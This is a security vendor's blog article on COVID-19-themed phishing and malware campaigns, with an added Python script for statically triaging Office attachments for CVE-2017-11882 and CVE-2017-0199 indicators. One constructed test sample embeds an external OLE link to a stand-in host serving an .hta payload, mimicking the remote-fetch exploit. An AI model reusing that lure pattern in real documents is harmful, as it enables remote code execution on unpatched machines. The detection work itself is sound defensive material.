The coronavirus pandemic (COVID-19, caused by SARS-CoV-2) has turned the lives of people across the globe into a nightmare. Attackers have seized on the pandemic as an opportunity to spread malware and ransomware, preying on people's state of mind in a time of crisis. The shift to remote working has also given threat actors additional openings to infiltrate organizations.

A majority of recent attacks fall under what we refer to here as the COVID-19 campaign: the digital world's own pandemic. The recent wave of attacks under this campaign has included spam impersonating the Centers for Disease Control and Prevention (CDC) and the World Health Organization (WHO). While some ransomware operators have publicly backed off from targeting healthcare, attacks on COVID-19 testing centers, which are critical at this time, have still been observed in several parts of Europe.


Attacks under the umbrella of COVID-19 Campaign

  • APT36 (also known as Transparent Tribe, ProjectM, Mythic Leopard and TEMP.Lapis), a state-sponsored threat actor, has been distributing the Crimson Remote Administration Tool (RAT) via malicious documents disguised as health advisories from Indian government officials. The attackers steal credentials from victims' browsers, capture screenshots, and collect information about running processes, directories and drives on the target systems.
  • Several other state-sponsored APTs have been linked to this campaign:
    Chinese APTs: Mustang Panda and Vicious Panda
    North Korean APT: Kimsuky
    Russian APTs: Hades and TA542
  • The TrickBot Trojan was distributed in Italy using malicious Word documents. Once installed on a target, the Trojan steals confidential information and moves laterally across the network. TrickBot typically then launches PowerShell Empire or Cobalt Strike and hands access to the Ryuk ransomware operators for further infection.
  • Several new malware families have simply been named "CoronaVirus". CoronaVirus ransomware has been distributed alongside the KPOT information-stealing Trojan through a fake website impersonating WiseCleaner, a legitimate Windows system utility. Another piece of CoronaVirus malware locked users out of their Windows systems.
  • The GuLoader malware downloader was distributed as a ZIP attachment to emails. GuLoader in turn downloads the FormBook information-stealing Trojan, which has keylogging functionality and steals banking credentials, website login credentials, cookies and more.
  • The Raccoon information stealer has been distributed through open redirects on the website of the U.S. Department of Health & Human Services. These redirect victims to phishing landing pages that then download the malware onto the target.
  • Netwalker ransomware infections have become prevalent under the COVID-19 campaign, delivered as malicious email attachments.
  • The Redline information-stealing Trojan has been distributed through emails urging users to download the Folding@home application but delivering the malware instead. It can steal saved login credentials, credit card data, cookies and autocomplete fields from browsers.
  • A few attacks hijacked routers and changed their DNS settings so that victims were shown alerts for a fake COVID-19 information app purportedly from the World Health Organization, which delivered the Oski information-stealing malware. Such attacks can be used to steal money from bank accounts, commit identity theft, or launch further spear phishing attacks.
  • The Zeus Sphinx banking Trojan has resurfaced after roughly three years to steal banking credentials under the COVID-19 spear phishing campaign.
  • Another wave of attacks delivered the LokiBot Trojan using similar spear phishing lures.

A careful analysis of each of these attacks reveals that the main attack vector in this campaign is spear phishing email with COVID-19 themed lures.

A variety of attachments, including Microsoft Office files, ZIP archives, Excel workbooks with malicious embedded macros, RTF documents and PDFs, are being distributed with coronavirus-themed spam emails, alongside links that abuse open redirects on legitimate websites.


Vulnerabilities exploited

The distributed lure documents are known to exploit CVE-2017-11882 and CVE-2017-0199, two critical remote code execution vulnerabilities in Microsoft Office. CVE-2017-11882 is a stack buffer overflow in the legacy Equation Editor component (EQNEDT32.EXE), triggered by a crafted embedded Equation object; CVE-2017-0199 lets an RTF or Word document carrying an auto-updating OLE link fetch and execute a remote HTA payload. Both were patched in late 2017, so Office installations that are behind on updates are the ones at risk.
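Both vulnerabilities leave structural fingerprints in the lure document itself, so attachments can be triaged statically before any sandbox run. The script below is an added example (not SecPod or SanerNow code): it sniffs the real file type rather than trusting the extension, decodes the hex blobs behind RTF \objdata and looks for the Equation Editor class name or CLSID (the CVE-2017-11882 pattern), flags auto-updating or external OLE links in RTF and OOXML packages (the CVE-2017-0199 pattern), and reports embedded VBA projects. The sample documents, file names and the URL in them are constructed for the example and are not real malware.

```python
"""Static triage of COVID-19 lure attachments (added example, not SecPod code).

Indicators looked for:
  * Equation Editor OLE object, by class name or CLSID   -> CVE-2017-11882
  * auto-updating / external OLE link (OLE2Link, .rels)  -> CVE-2017-0199
  * vbaProject.bin inside an OOXML package               -> macro document
"""
import io
import re
import zipfile
from typing import List

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046}, in the
# little-endian layout it has inside OLE streams.
EQNEDT_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
OLE_REL_TYPE = "relationships/oleObject"


def _rtf_objdata_blobs(rtf: bytes) -> List[bytes]:
    """Decode every hex blob that follows \\objdata into raw OLE1 bytes."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b(.*?)}", rtf, re.S):
        hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        if len(hexchars) % 2:            # tolerate a truncated trailing nibble
            hexchars = hexchars[:-1]
        blobs.append(bytes.fromhex(hexchars.decode("ascii")))
    return blobs


def triage_rtf(rtf: bytes) -> List[str]:
    hits = []
    low = rtf.lower()
    if b"\\objclass equation.3" in low:
        hits.append("rtf objclass Equation.3 (CVE-2017-11882 pattern)")
    if b"\\objautlink" in low and b"\\objupdate" in low:
        hits.append("rtf auto-updating linked object (CVE-2017-0199 pattern)")
    for blob in _rtf_objdata_blobs(rtf):     # class name may be hidden in objdata only
        if b"equation.3" in blob.lower() or EQNEDT_CLSID in blob:
            hits.append("rtf objdata embeds Equation Editor (CVE-2017-11882 pattern)")
        if b"ole2link" in blob.lower():
            hits.append("rtf objdata contains OLE2Link (CVE-2017-0199 pattern)")
    return hits


def triage_ooxml(doc: bytes) -> List[str]:
    hits = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(doc))
    except zipfile.BadZipFile:
        return hits
    for name in zf.namelist():
        lname = name.lower()
        if lname.endswith("vbaproject.bin"):
            hits.append(f"VBA project present: {name}")
        elif lname.endswith(".rels"):
            rels = zf.read(name).decode("utf-8", "replace")
            for rel in re.findall(r"<Relationship\b[^>]*>", rels):
                if OLE_REL_TYPE in rel and 'TargetMode="External"' in rel:
                    hits.append(f"external OLE link in {name} (CVE-2017-0199 pattern)")
        elif "/embeddings/" in lname:
            blob = zf.read(name)
            if EQNEDT_CLSID in blob or "Equation Native".encode("utf-16-le") in blob:
                hits.append(f"embedded Equation object {name} (CVE-2017-11882 pattern)")
    return hits


def triage_attachment(data: bytes) -> List[str]:
    """Dispatch on content, not on the extension given in the e-mail."""
    if data.lstrip().startswith(b"{\\rt"):   # Word accepts "{\rt" as an RTF header
        return triage_rtf(data)
    if data.startswith(b"PK\x03\x04"):        # OOXML package (.docx/.docm/.xlsx ...)
        return triage_ooxml(data)
    return []


# --- constructed samples for the example (not real malware) -----------------
def sample_equation_rtf() -> bytes:
    # Minimal OLE1 header: version, format id, class-name length, "Equation.3".
    ole1 = b"\x01\x05\x00\x00\x02\x00\x00\x00\x0b\x00\x00\x00Equation.3\x00"
    return (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
            b"{\\*\\objdata " + ole1.hex().encode() + b"}}}")


def sample_macro_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")   # stub OLE header
        zf.writestr("word/_rels/document.xml.rels",
                    '<Relationships><Relationship Id="rId9" Type="http://schemas.'
                    'openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                    'Target="http://lure.example.invalid/covid.hta" '
                    'TargetMode="External"/></Relationships>')
    return buf.getvalue()


def sample_clean_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in [("advisory.doc", sample_equation_rtf()),
                        ("form.docm", sample_macro_docx()),
                        ("clean.docx", sample_clean_docx())]:
        print(label, "->", triage_attachment(blob) or ["no indicators"])
```

An Equation.3 object in inbound mail is worth quarantining outright: Microsoft removed Equation Editor from Office in the January 2018 updates, and legitimate documents rarely carry one. The external-OLE-link check is the same whether the document exploits CVE-2017-0199 or merely abuses the feature on a patched host, so treat it as a phishing indicator rather than proof of exploitation.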


SanerNow lists the potential targets for this malware in an enterprise network (shown in the figures below), along with the attack vectors used by each malware family or cyber-espionage group, and facilitates automated patching of these vulnerabilities on affected systems. Additional details, such as the specific behavior of each malware family or group, help organizations prevent security incidents effectively.

Fig1. SanerNow listing of potential targets in an organization for COVID-19 Campaign

Fig2. Details about COVID-19 Campaign


General recommendations to prevent attacks during the COVID-19 Crisis

  • Refrain from opening emails and messages from unknown senders.
  • Avoid clicking links and opening documents sent over instant messaging platforms or email. Look up information on the legitimate organization's own website instead of following links found elsewhere.
  • Keep your systems up to date with the latest security patches.
  • Educate your teams and other members of the organization to keep security products enabled while working remotely. Here are a few guidelines that would prove useful.
  • Never provide sensitive information to people reaching out by phone or email. WHO and other governmental organizations never ask for sensitive data or solicit direct donations for emergency response.
  • Set strong and unique passwords wherever applicable.

SanerNow detects the vulnerabilities that could be used as infection vectors in the COVID-19 campaign. Download SanerNow and keep your systems updated and secure.


Article: COVID-19 of the digital world
Publisher: SecPod Technologies
